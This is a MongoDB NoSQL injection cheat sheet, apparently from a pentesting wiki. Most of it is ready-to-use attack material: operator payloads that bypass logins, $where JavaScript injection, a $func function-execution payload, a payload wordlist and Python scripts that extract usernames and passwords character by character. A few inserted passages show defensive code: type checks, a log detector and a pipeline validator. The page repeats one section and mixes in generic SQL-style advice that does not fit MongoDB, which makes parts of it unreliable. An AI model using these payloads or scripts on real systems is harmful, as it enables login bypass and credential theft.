# NoSQL Injection
## Exploit
In PHP you can send an array by changing the submitted parameter from _parameter=foo_ to _parameter\[arrName]=foo._
The exploits are based on adding an **operator**:
```bash
username[$ne]=1&password[$ne]=1 #<Not Equals>
username[$regex]=^adm&password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches none of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### Basic authentication bypass
**Using not equal ($ne) or greater ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
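Why these payloads pass a login check, and the type check that stops them, as an added example that is not part of the original page. The user records are constructed, and `findOne`/`matchField` are a hypothetical in-memory stand-in for MongoDB filter matching that supports only the few operators shown above.

```javascript
// Constructed sample data standing in for a `users` collection.
const users = [
  { username: "admin", password: "mdp" },
  { username: "toto", password: "s3cret" },
];

// Toy matcher (assumption: mimics only $eq, $ne, $gt, $regex, $exists).
function matchField(value, cond) {
  if (cond === null || typeof cond !== "object") return value === cond; // plain equality
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case "$eq": return value === arg;
      case "$ne": return value !== arg;
      case "$gt": return value > arg;
      case "$regex": return new RegExp(arg).test(String(value));
      case "$exists": return (value !== undefined) === Boolean(arg);
      default: throw new Error("unsupported operator " + op);
    }
  });
}

function findOne(filter) {
  const hit = users.find(doc =>
    Object.entries(filter).every(([field, cond]) => matchField(doc[field], cond)));
  return hit || null;
}

// Vulnerable: whatever the body parser produced (string OR object) becomes the filter.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password });
}

// Hardened: only strings are accepted, so {"$ne": null} or the array/object built
// from username[$ne]=... is rejected before it can be read as an operator.
function loginHardened(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return null;
  }
  return findOne({ username: body.username, password: body.password });
}
```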
### **SQL - Mongo**
#### **NoSQL Injection**
NoSQL injection is a type of vulnerability that occurs when an attacker is able to manipulate a NoSQL query in order to retrieve unauthorized data or perform unauthorized actions on a NoSQL database.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting a boolean expression into the query in order to determine if a specific condition is true or false. By manipulating the query, an attacker can extract sensitive information from the database.
2. **Time-based Injection**: In this technique, an attacker injects a delay into the query in order to determine if a specific condition is true or false. By measuring the time it takes for the query to execute, an attacker can extract information from the database.
3. **Error-based Injection**: This technique involves injecting a query that causes an error in order to extract information from the error message. By manipulating the query, an attacker can retrieve sensitive data from the database.
4. **Union-based Injection**: In this technique, an attacker injects a query that combines the results of two or more queries into a single result set. By manipulating the query, an attacker can retrieve data from multiple tables in the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow these best practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a NoSQL query.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and sanitized.
3. **Least Privilege Principle**: Limit the privileges of the database user used by the application to only what is necessary.
4. **Secure Configuration**: Ensure that the NoSQL database is properly configured and secured to prevent unauthorized access.
By following these best practices, you can significantly reduce the risk of NoSQL injection vulnerabilities in your application.
```javascript
query = { $where: `this.username == '${username}'` }
```
An attacker can exploit this by supplying input such as `admin' || 'a'=='a`, which makes the query return all documents because the condition is satisfied by a tautology (`'a'=='a'`). This is analogous to SQL injection, where input such as `' or 1=1-- -` is used to manipulate SQL queries. In MongoDB, similar injections can be done with input such as `' || 1==1//`, `' || 1==1%00`, or `admin' || 'a'=='a`.
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
```
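The `$where` concatenation above next to a filter that never builds JavaScript from input, as an added example that is not part of the original page. `findWhere` is a hypothetical stand-in that evaluates the string locally the way server-side `$where` would, and the documents are constructed.

```javascript
// Constructed sample documents.
const docs = [
  { username: "admin", credits: 10 },
  { username: "alice", credits: 3 },
  { username: "bob", credits: 7 },
];

// Toy stand-in for server-side $where: the source string is executed as JavaScript
// with `this` bound to each document. The newline before ")" keeps a trailing
// "//" comment in the input from swallowing the closing parenthesis.
function findWhere(whereSource) {
  const predicate = new Function("return (" + whereSource + "\n);");
  return docs.filter(doc => Boolean(predicate.call(doc)));
}

// Vulnerable: same construction as the query on the page.
function findUserVulnerable(username) {
  return findWhere(`this.username == '${username}'`);
}

// Hardened: no JavaScript is built from input; the value is compared as data,
// which corresponds to a plain { username: <string> } filter.
function findUserHardened(username) {
  if (typeof username !== "string") return [];
  return docs.filter(doc => doc.username === username);
}
```

Where a deployment does not need `$where` at all, setting `security.javascriptEnabled: false` in the mongod configuration disables server-side JavaScript entirely.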
### Extract **length** information
To extract the length information in a NoSQL injection attack, you can use the `$where` operator in MongoDB or the `regex` operator in other NoSQL databases.
#### MongoDB
In MongoDB, you can use the `$where` operator to execute JavaScript code on the server. By using the `toString()` method on the target field and checking its length, you can extract the length information.
```javascript
db.collection.find({ $where: "this.target.toString().length == 10" })
```
Replace `collection` with the name of the target collection and `target` with the name of the field you want to extract the length from. Adjust the length value (`10` in the example) according to your needs.
#### Other NoSQL Databases
In other NoSQL databases, you can use the `regex` operator to match a regular expression against the target field. By crafting a regular expression that matches a specific length, you can extract the length information.
```javascript
db.collection.find({ field: { $regex: /^.{10}$/ } })
```
Replace `collection` with the name of the target collection, `field` with the name of the field you want to extract the length from, and adjust the length value (`10` in the example) according to your needs.
Remember to test different lengths to find the correct length of the target field.
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### Extract **data** information
You can use NoSQL injection to probe and extract data from applications that use NoSQL technology. Doing so can yield important information such as usernames, passwords, email addresses, and other confidential data.
There are several ways to do this, depending on the kind of NoSQL injection the application is exposed to. Here are two common approaches:
#### 1. NoSQL injection through standard queries
If the application uses standard queries such as `find`, `findOne`, or `aggregate`, you can try NoSQL injection by modifying those queries. For example, you can try turning a normal query into an injected one by adding an operator such as `$ne` (not equal) or `$regex` (regular expression).
#### 2. NoSQL injection through standard queries and combined queries
If the application uses a combination of standard queries, you can try NoSQL injection by combining different queries. For example, you can try combining standard queries with operators such as `$ne` or `$regex` to obtain confidential information.
It is important to understand the data structure and how the queries work so that you can modify the queries correctly and obtain the information you are looking for.
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
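On the defending side, the character-by-character pattern above is easy to spot in request logs: one client sends `$regex` values for the same field whose literal prefix grows one character at a time. The detector below is an added example, not part of the original page; the log format (`ip method path body`) and the log lines are constructed, and the threshold of three steps is an assumption.

```javascript
// Constructed log lines in an assumed "ip method path body" format.
const SAMPLE_LOG = [
  "10.0.0.5 POST /login username[$ne]=toto&password[$regex]=a.{2}",
  "10.0.0.5 POST /login username[$ne]=toto&password[$regex]=b.{2}",
  "10.0.0.5 POST /login username[$ne]=toto&password[$regex]=m.{2}",
  "10.0.0.5 POST /login username[$ne]=toto&password[$regex]=md.{1}",
  "10.0.0.5 POST /login username[$ne]=toto&password[$regex]=mdp",
  "10.0.0.9 POST /login username=alice&password=hunter2",
  "10.0.0.7 POST /search q[$regex]=^report",
];

const OPERATOR_KEY = /^([^\[\]]+)\[(\$[a-z]+)\]/i; // e.g. password[$regex]

// Return every field[$operator]=value pair found in a form-encoded body.
function parseOperatorParams(body) {
  const hits = [];
  for (const [key, value] of new URLSearchParams(body)) {
    const m = OPERATOR_KEY.exec(key);
    if (m) hits.push({ field: m[1], op: m[2], value });
  }
  return hits;
}

// Strip a leading ^ and a trailing .* or .{n} to get the literal being guessed.
function literalPrefix(regex) {
  return regex.replace(/^\^/, "").replace(/(\.\*|\.\{\d+\})\$?$/, "");
}

// Flag client/field pairs whose guessed prefixes form a chain of >= minChain
// one-character extensions (m -> md -> mdp).
function detectRegexExtraction(lines, minChain = 3) {
  const seen = new Map(); // "ip|field" -> Set of literal prefixes
  for (const line of lines) {
    const [ip, , , body = ""] = line.split(" ");
    for (const { field, op, value } of parseOperatorParams(body)) {
      if (op !== "$regex") continue;
      const key = ip + "|" + field;
      if (!seen.has(key)) seen.set(key, new Set());
      seen.get(key).add(literalPrefix(value));
    }
  }
  const alerts = [];
  for (const [key, prefixes] of seen) {
    const depth = new Map();
    let chain = 0;
    const ordered = [...prefixes].filter(Boolean).sort((a, b) => a.length - b.length);
    for (const p of ordered) {
      const d = (depth.get(p.slice(0, -1)) || 0) + 1; // extends a shorter guess?
      depth.set(p, d);
      chain = Math.max(chain, d);
    }
    if (chain >= minChain) {
      const [client, field] = key.split("|");
      alerts.push({ client, field, chain });
    }
  }
  return alerts;
}
```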
### **SQL - Mongo**
MongoDB is a popular NoSQL database that uses a document-oriented model to store data. It is widely used in web applications and offers a flexible and scalable solution for managing large amounts of data.
#### **NoSQL Injection**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB, by exploiting vulnerabilities in the application's input validation. This attack allows an attacker to manipulate the database queries and potentially gain unauthorized access to sensitive data.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting boolean-based queries to determine if a query is true or false. By manipulating the query, an attacker can extract information from the database.
2. **Time-based Injection**: In this technique, an attacker injects time delays into the query to determine if the injected query is executed. By measuring the response time, an attacker can extract information from the database.
3. **Union-based Injection**: Union-based injection involves injecting queries that combine the results of multiple queries. By manipulating the query, an attacker can extract information from different parts of the database.
4. **Error-based Injection**: Error-based injection involves injecting queries that cause the application to generate an error message. By analyzing the error message, an attacker can extract information from the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection attacks, it is important to implement proper input validation and sanitization techniques. Here are some best practices:
- **Input Validation**: Validate and sanitize all user input before using it in database queries.
- **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and treated as data, rather than executable code.
- **Least Privilege Principle**: Limit the privileges of the database user used by the application to minimize the potential impact of an injection attack.
- **Secure Configuration**: Ensure that the database server is properly configured and updated to mitigate known vulnerabilities.
By following these best practices, you can significantly reduce the risk of NoSQL injection attacks and protect your application's data.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
### PHP Arbitrary Function Execution
Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) library (used by default), it might be possible to execute an arbitrary function, as in [this report](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../.gitbook/assets/image (468).png>)
### Get info from a different collection
It is possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) to get info from a different collection. In the following example, we read from a **different collection** called **`users`** and get the **results of all the entries** with a password matching a wildcard filter.
```json
[
  {
    "$lookup": {
      "from": "users",
      "as": "resultado",
      "pipeline": [
        {
          "$match": {
            "password": {
              "$regex": "^.*"
            }
          }
        }
      ]
    }
  }
]
```
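An endpoint that accepts a client-built aggregation pipeline can refuse this by validating stages before they reach the database. The validator below is an added example, not part of the original page; the `ALLOWED_STAGES` policy and the function names are assumptions for an endpoint that only needs filtering, sorting and paging.

```javascript
// Assumed policy: the only stages this endpoint needs.
const ALLOWED_STAGES = new Set(["$match", "$sort", "$limit", "$skip", "$project"]);

// Operators that read other collections, write data, or run server-side JavaScript.
const FORBIDDEN_KEYS = new Set([
  "$lookup", "$graphLookup", "$unionWith", "$out", "$merge",
  "$where", "$function", "$accumulator",
]);

// Walk a stage body and return the path of the first forbidden key, or null.
function findForbidden(value, path) {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findForbidden(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value !== null && typeof value === "object") {
    for (const [key, child] of Object.entries(value)) {
      if (FORBIDDEN_KEYS.has(key)) return `${path}.${key}`;
      const hit = findForbidden(child, `${path}.${key}`);
      if (hit) return hit;
    }
  }
  return null;
}

function validatePipeline(pipeline) {
  if (!Array.isArray(pipeline)) {
    return { ok: false, reason: "pipeline must be an array" };
  }
  for (const [i, stage] of pipeline.entries()) {
    const keys = stage !== null && typeof stage === "object" ? Object.keys(stage) : [];
    if (keys.length !== 1 || !ALLOWED_STAGES.has(keys[0])) {
      return { ok: false, reason: `stage ${i} (${keys[0]}) is not allowed` };
    }
    const hit = findForbidden(stage[keys[0]], `pipeline[${i}].${keys[0]}`);
    if (hit) return { ok: false, reason: `forbidden operator at ${hit}` };
  }
  return { ok: true, reason: "" };
}
```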
## MongoDB Payloads
List [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## Blind NoSQL Script
### Description
Blind NoSQL Injection is a type of attack in which someone tries to manipulate or obtain information from a NoSQL database. The attack relies on a weakness in how the application handles NoSQL database queries.
### Step 1: Checking for the Vulnerability
Before starting a Blind NoSQL Injection attack, it is important to check whether the application under test has this weakness. You can do so by examining the application's responses and looking for signs of a NoSQL Injection vulnerability.
### Step 2: Discovering the Database Structure
To carry out a Blind NoSQL Injection attack, you need to discover the database structure. This can be done by sending different requests and examining the responses to work out the structure of the database.
### Step 3: Building the Blind NoSQL Script
Once the database structure is known, you can start building the Blind NoSQL Injection script. The script is used to drive the requests and issue NoSQL Injection queries using blind techniques.
### Step 4: Running the Attack
The final step is to run the Blind NoSQL Injection attack using the script. The attack can expose sensitive information from the database or even give control over the application itself.
### Caution
It is important to recognise that a Blind NoSQL Injection attack is against the law and can cause serious harm. Only carry out this attack with the permission of the owner of the target system and for security testing purposes.
```python
import requests, string

alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(21):
    print("[i] Looking for char number "+str(i+1))
    for char in alphabet:
        r = requests.get("http://chall.com?param=^"+flag+char)
        if ("<TRUE>" in r.text):
            flag += char
            print("[+] Flag: "+flag)
            break
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

u = "http://example.com/login"  # placeholder target URL; the page does not define `u`
username="admin"
password=""

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = {'ids': payload}, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
```
### Brute-force login usernames and passwords from POST login
This is a simple script that you could modify, but the previous tools can also do this task.
```python
import requests
import string

url = "http://example.com"
headers = {"Host": "example.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]

def get_password(username):
    print("Extracting password of "+username)
    params = {"username":username, "password[$regex]":"", "login": "login"}
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
            if int(pr.status_code) == 302:
                password += c
                break
        if c == possible_chars[-1]:
            print("Found password "+password[1:].replace("\\", "")+" for username "+username)
            return password[1:].replace("\\", "")

def get_usernames(prefix):
    usernames = []
    params = {"username[$regex]":"", "password[$regex]":".*"}
    for c in possible_chars:
        username = "^" + prefix + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print(username)
            for user in get_usernames(prefix + c):
                usernames.append(user)
    return usernames

for u in get_usernames(""):
    get_password(u)
```
## Tools
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)